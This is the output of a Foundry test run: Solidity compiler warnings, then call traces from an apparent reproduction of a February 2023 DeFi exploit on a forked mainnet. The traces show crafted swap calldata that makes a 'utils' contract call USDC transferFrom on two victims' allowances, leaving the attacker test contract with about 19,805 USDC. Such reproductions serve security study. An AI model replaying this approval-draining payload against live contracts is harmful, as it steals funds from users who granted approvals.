Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.28s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-02/RevertFinance_exp.sol:30:5:
   |
30 |     IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-02/RevertFinance_exp.sol:71:27:
   |
71 |     function transferFrom(address from, address to, uint256 value) external returns (bool) {
   |                           ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-02/RevertFinance_exp.sol:71:41:
   |
71 |     function transferFrom(address from, address to, uint256 value) external returns (bool) {
   |                                         ^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-02/RevertFinance_exp.sol:71:53:
   |
71 |     function transferFrom(address from, address to, uint256 value) external returns (bool) {
   |                                                     ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-02/RevertFinance_exp.sol:76:22:
   |
76 |     function approve(address spender, uint256 value) external returns (bool) {
   |                      ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-02/RevertFinance_exp.sol:76:39:
   |
76 |     function approve(address spender, uint256 value) external returns (bool) {
   |                                       ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-02/RevertFinance_exp.sol:80:23:
   |
80 |     function transfer(address to, uint256 value) external returns (bool) {
   |                       ^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-02/RevertFinance_exp.sol:80:35:
   |
80 |     function transfer(address to, uint256 value) external returns (bool) {
   |                                   ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-02/RevertFinance_exp.sol:85:9:
   |
85 |         address owner
   |         ^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2023-02/RevertFinance_exp.sol:76:5:
   |
76 |     function approve(address spender, uint256 value) external returns (bool) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2023-02/RevertFinance_exp.sol:80:5:
   |
80 |     function transfer(address to, uint256 value) external returns (bool) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 464.98ms (1.78ms CPU time)

Ran 1 test for src/test/2023-02/RevertFinance_exp.sol:ContractTest
[PASS] testExploit() (gas: 159109)
Logs:
  Attacker USDC balance after exploit: 19805.581627

Traces:
  [11831] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 16653389 [1.665e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD], "utils")
    │   └─ ← [Return]
    ├─ [0] VM::label(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], "USDC")
    │   └─ ← [Return]
    └─ ← [Stop]

  [204152] ContractTest::testExploit()
    ├─ [9815] USDC::balanceOf(0x067D0F9089743271058D4Bf2a1a29f4E9C6fdd1b) [staticcall]
    │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x067D0F9089743271058D4Bf2a1a29f4E9C6fdd1b) [delegatecall]
    │   │   └─ ← [Return] 19305581627 [1.93e10]
    │   └─ ← [Return] 19305581627 [1.93e10]
    ├─ [3426] USDC::allowance(0x067D0F9089743271058D4Bf2a1a29f4E9C6fdd1b, utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   ├─ [2637] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::allowance(0x067D0F9089743271058D4Bf2a1a29f4E9C6fdd1b, utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [delegatecall]
    │   │   └─ ← [Return] 38315581627 [3.831e10]
    │   └─ ← [Return] 38315581627 [3.831e10]
    ├─ [85620] utils::swap(SwapParams({ tokenIn: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, tokenOut: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, amountIn: 1, minAmountOut: 0, recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, swapData: 0x000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000006423b872dd000000000000000000000000067d0f9089743271058d4bf2a1a29f4e9c6fdd1b0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000047eb3cc3b00000000000000000000000000000000000000000000000000000000, unwrap: false }))
    │   ├─ [2875] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [21376] ContractTest::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD], 1)
    │   │   ├─  storage changes:
    │   │   │   @ 34: 0 → 1
    │   │   └─ ← [Return] true
    │   ├─ [886] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [886] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [886] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [841] ContractTest::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   ├─ [41492] USDC::transferFrom(0x067D0F9089743271058D4Bf2a1a29f4E9C6fdd1b, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19305581627 [1.93e10])
    │   │   ├─ [40697] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(0x067D0F9089743271058D4Bf2a1a29f4E9C6fdd1b, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19305581627 [1.93e10]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x067D0F9089743271058D4Bf2a1a29f4E9C6fdd1b, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 19305581627 [1.93e10])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000000047eb3cc3b
    │   │   │   │   @ 0x4a96c81e71ccd02eb17a77cbfbb5f9f4be0ed96e1654d5e05661aa9f1a0662be: 0x00000000000000000000000000000000000000000000000000000008ebc960bb → 0x000000000000000000000000000000000000000000000000000000046d159480
    │   │   │   │   @ 0x98e78f8a3091abed0420ffcdcf5bc3289b528d2e2806b88c30d88808431d630d: 0x000000000000000000000000000000000000000000000000000000047eb3cc3b → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [841] ContractTest::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   └─ ← [Return] true
    │   ├─ [886] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [886] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ emit Swap(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 0)
    │   ├─ [884] ContractTest::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [3315] USDC::balanceOf(0x4107A0A4a50AC2c4cc8C5a3954Bc01ff134506b2) [staticcall]
    │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x4107A0A4a50AC2c4cc8C5a3954Bc01ff134506b2) [delegatecall]
    │   │   └─ ← [Return] 608929547 [6.089e8]
    │   └─ ← [Return] 608929547 [6.089e8]
    ├─ [3426] USDC::allowance(0x4107A0A4a50AC2c4cc8C5a3954Bc01ff134506b2, utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   ├─ [2637] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::allowance(0x4107A0A4a50AC2c4cc8C5a3954Bc01ff134506b2, utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [delegatecall]
    │   │   └─ ← [Return] 500000000 [5e8]
    │   └─ ← [Return] 500000000 [5e8]
    ├─ [1426] USDC::allowance(0x4107A0A4a50AC2c4cc8C5a3954Bc01ff134506b2, utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   ├─ [637] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::allowance(0x4107A0A4a50AC2c4cc8C5a3954Bc01ff134506b2, utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [delegatecall]
    │   │   └─ ← [Return] 500000000 [5e8]
    │   └─ ← [Return] 500000000 [5e8]
    ├─ [55720] utils::swap(SwapParams({ tokenIn: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, tokenOut: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, amountIn: 1, minAmountOut: 0, recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, swapData: 0x000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000006423b872dd0000000000000000000000004107a0a4a50ac2c4cc8c5a3954bc01ff134506b20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000001dcd650000000000000000000000000000000000000000000000000000000000, unwrap: false }))
    │   ├─ [875] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [21376] ContractTest::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD], 1)
    │   │   ├─  storage changes:
    │   │   │   @ 34: 0 → 1
    │   │   └─ ← [Return] true
    │   ├─ [886] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [886] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [886] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [841] ContractTest::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   ├─ [13592] USDC::transferFrom(0x4107A0A4a50AC2c4cc8C5a3954Bc01ff134506b2, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000 [5e8])
    │   │   ├─ [12797] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(0x4107A0A4a50AC2c4cc8C5a3954Bc01ff134506b2, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000 [5e8]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x4107A0A4a50AC2c4cc8C5a3954Bc01ff134506b2, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 500000000 [5e8])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x785805280e4fe1c79a2d2b9be7fa1ac71dccadf237d1694fb65c2eb484400403: 0x00000000000000000000000000000000000000000000000000000000244b870b → 0x00000000000000000000000000000000000000000000000000000000067e220b
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000000047eb3cc3b → 0x000000000000000000000000000000000000000000000000000000049c81313b
    │   │   │   │   @ 0xbb0368641668650471f12c49a8133735da9335d66961ddd5cda94aa281e1b2c3: 0x000000000000000000000000000000000000000000000000000000001dcd6500 → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [841] ContractTest::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   └─ ← [Return] true
    │   ├─ [886] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [886] ContractTest::balanceOf(utils: [0x531110418d8591C92e9cBBFC722Db8FFb604FAFD]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ emit Swap(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 0)
    │   ├─ [884] ContractTest::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [1315] USDC::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 19805581627 [1.98e10]
    │   └─ ← [Return] 19805581627 [1.98e10]
    ├─ [3164] USDC::decimals() [staticcall]
    │   ├─ [2381] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC balance after exploit", val: 19805581627 [1.98e10], decimals: 6)
    ├─  storage changes:
    │   @ 34: 1 → 0
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.55s (4.08s CPU time)

Ran 2 test suites in 6.40s (6.02s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
